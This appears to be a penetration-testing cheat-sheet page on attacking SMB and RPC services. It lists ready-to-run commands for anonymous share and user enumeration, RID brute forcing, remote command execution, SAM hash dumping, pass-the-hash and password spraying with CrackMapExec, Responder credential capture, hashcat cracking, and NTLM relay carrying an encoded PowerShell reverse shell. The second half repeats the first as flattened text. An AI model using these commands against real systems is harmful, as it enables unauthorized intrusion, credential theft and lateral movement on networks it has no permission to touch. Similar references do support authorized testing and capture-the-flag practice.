SMB, RPC - 137,138,139,445,111

SMBclient

# Connecting to the Share by starting a null session or like anonymous access 
smbclient -N -L //ip

# login with no user/pass and get prompt for further enum 
smbclient //ip/notes

# login with valid user and pass
smbclient -U 'user%pass' //ip/new-site

# Downloading a file 
get filename

# Run system commands using !<cmd> 
!ls
!cat something

# Checking connections to samba
smbstatus

Nmap SMB scripts

# Nmap scanning for smb 
nmap ip -sV -sC -p139,445

# Vulnerabilties nmap scan
nmap -p445 --script smb-vuln-* <target>

RPCclient

# nmap script scan
nmap -sV -p 111 --script=rpcinfo $RHOST

# If you find NFS-related services, enumerate those.
nmap -p 111 --script nfs* $RHOST

# Connecting to smbserver 
rpcclient -U "" ip

Some comand to get information :

----------------------- RPCclient Enumeration -------------------------

# Server information
srvinfo	

# Enumerate all domains that are deployed in the network.
enumdomains

# Provides domain, server, and user information of deployed domains
querydominfo

# Enumerates all available shares.
netshareenumall

# Provides information about a specific share.
netsharetargetinfo <share>

----------------------- RPCclient User Enumeration ------------------------

# Enumerates all domain users.
enumdomusers

# Provides information about a specific user.
queryuser <RID>

----------------------- RPCclient Group Enumeration -----------------------
# Enumerates all domain groups.
enumdomgroups

# it provide info about group with given RID
querygroup 0x201

# Enumerate group member using id
querygroupmem 0x200

SMBmap

# Link : <https://github.com/ShawnDEvans/smbmap>

smbmap -H ip
smbmap -H ip -u eren
smbmap -R directory -H ip
smbmap -R directory -H ip -A Groups.xml -q
smbmap -d active.htb -u user -p password -H ip -R Users

smbmap -H ip --download "notes\\note.txt"
smbmap -H ip --upload test.txt "notes\\test.txt"

CrackMapExec

# Link : <https://github.com/Porchetta-Industries/CrackMapExec>

crackmapexec smb ip --shares -u '' -p ''

# To execute commands remotely 
crackmapexec smb ip -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

# Enumerating Logged-on Users
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --loggedon-users

# Extract Hashes from SAM Database
crackmapexec smb ip -u administrator -p 'Password123!' --sam

# Pass-the-Hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

# Password spraying
crackmapexec smb ip -u /tmp/userlist.txt -p 'Company01!' --continue-on-success

Enum4linux-ng

# Link : <https://github.com/cddmp/enum4linux-ng>

# Installation
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
pip3 install -r requirements.txt

# Enumeration
./enum4linux-ng.py ip -A
./enum4linux-ng.py ip -A -C

PsExec

# To connect to a remote machine with a local administrator account
impacket-psexec administrator:'Password123!'@ip

Responder

# created a fake SMB server using the Responder default configuration
responder -I <interface name>
sudo responder -I ens33

# NetNTLMv2 - Crack the hash using hashcat 
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Can’t Crack the Hash ?

# impacket-ntlmrelayx
# It will dump SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t ip

# Relaying the hash and executing a command, like reverse shell below base64 encoded 
impacket-ntlmrelayx --no-http-server -smb2support -t ip -c 'powershell -e JABj----kA'

# CrackMapExec
# PassTheHash
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Brute Forcing User RIDs

# Using command line
for i in $(seq 500 1100);do rpcclient -N -U "" ip -c "queryuser 0x$(printf '%x\\n' $i)" | grep "User Name\\|user_rid\\|group_rid" && echo "";done

# Python Script from Impacket - Samrdump.py
samrdump.py ip

PreviousCross-Forest Trust Abuse NextMYSQL - 3306

Last updated 2 years ago

# Connecting to the Share by starting a null session or like anonymous access smbclient -N -L //ip # login with no user/pass and get prompt for further enum smbclient //ip/notes # login with valid user and pass smbclient -U 'user%pass' //ip/new-site # Downloading a file get filename # Run system commands using !<cmd> !ls !cat something # Checking connections to samba smbstatus

----------------------- RPCclient Enumeration ------------------------- # Server information srvinfo # Enumerate all domains that are deployed in the network. enumdomains # Provides domain, server, and user information of deployed domains querydominfo # Enumerates all available shares. netshareenumall # Provides information about a specific share. netsharetargetinfo <share> ----------------------- RPCclient User Enumeration ------------------------ # Enumerates all domain users. enumdomusers # Provides information about a specific user. queryuser <RID> ----------------------- RPCclient Group Enumeration ----------------------- # Enumerates all domain groups. enumdomgroups # it provide info about group with given RID querygroup 0x201 # Enumerate group member using id querygroupmem 0x200

# Link : <https://github.com/ShawnDEvans/smbmap> smbmap -H ip smbmap -H ip -u eren smbmap -R directory -H ip smbmap -R directory -H ip -A Groups.xml -q smbmap -d active.htb -u user -p password -H ip -R Users smbmap -H ip --download "notes\\note.txt" smbmap -H ip --upload test.txt "notes\\test.txt"

# Link : <https://github.com/Porchetta-Industries/CrackMapExec> crackmapexec smb ip --shares -u '' -p '' # To execute commands remotely crackmapexec smb ip -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec # Enumerating Logged-on Users crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --loggedon-users # Extract Hashes from SAM Database crackmapexec smb ip -u administrator -p 'Password123!' --sam # Pass-the-Hash (PtH) crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE # Password spraying crackmapexec smb ip -u /tmp/userlist.txt -p 'Company01!' --continue-on-success

# Link : <https://github.com/cddmp/enum4linux-ng> # Installation git clone https://github.com/cddmp/enum4linux-ng.git cd enum4linux-ng pip3 install -r requirements.txt # Enumeration ./enum4linux-ng.py ip -A ./enum4linux-ng.py ip -A -C

# created a fake SMB server using the Responder default configuration responder -I <interface name> sudo responder -I ens33 # NetNTLMv2 - Crack the hash using hashcat hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

# impacket-ntlmrelayx # It will dump SAM database impacket-ntlmrelayx --no-http-server -smb2support -t ip # Relaying the hash and executing a command, like reverse shell below base64 encoded impacket-ntlmrelayx --no-http-server -smb2support -t ip -c 'powershell -e JABj----kA' # CrackMapExec # PassTheHash crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

# Using command line for i in $(seq 500 1100);do rpcclient -N -U "" ip -c "queryuser 0x$(printf '%x\\n' $i)" | grep "User Name\\|user_rid\\|group_rid" && echo "";done # Python Script from Impacket - Samrdump.py samrdump.py ip